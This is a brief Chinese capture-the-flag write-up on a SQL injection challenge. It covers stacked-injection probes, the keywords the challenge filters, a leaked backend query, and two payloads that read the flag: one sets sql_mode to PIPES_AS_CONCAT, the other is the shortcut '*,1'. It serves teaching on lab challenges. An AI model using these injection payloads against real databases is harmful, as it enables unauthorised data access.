单引号无报错,尝试堆叠注入可以回显。
和 [强网杯 2019]随便注这道题一样查库查表查字段
1;show databases;
1;show tables;
但是执行
1;desc `Flag`;
1;show columns from Flag;
返回了"Nonono.“测试出被过滤了:desc、from、Flag。
接下来的都是抄网上的预期解也是第一次见。
比赛时源码泄露
select $_GET['query'] || flag from flag
在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接,但在mysql 缺省不支持。需要调整mysql 的sql_mode
模式:pipes_as_concat 来实现oracle 的一些功能
payload
1;set sql_mode=PIPES_AS_CONCAT;select 1
非预期解
*,1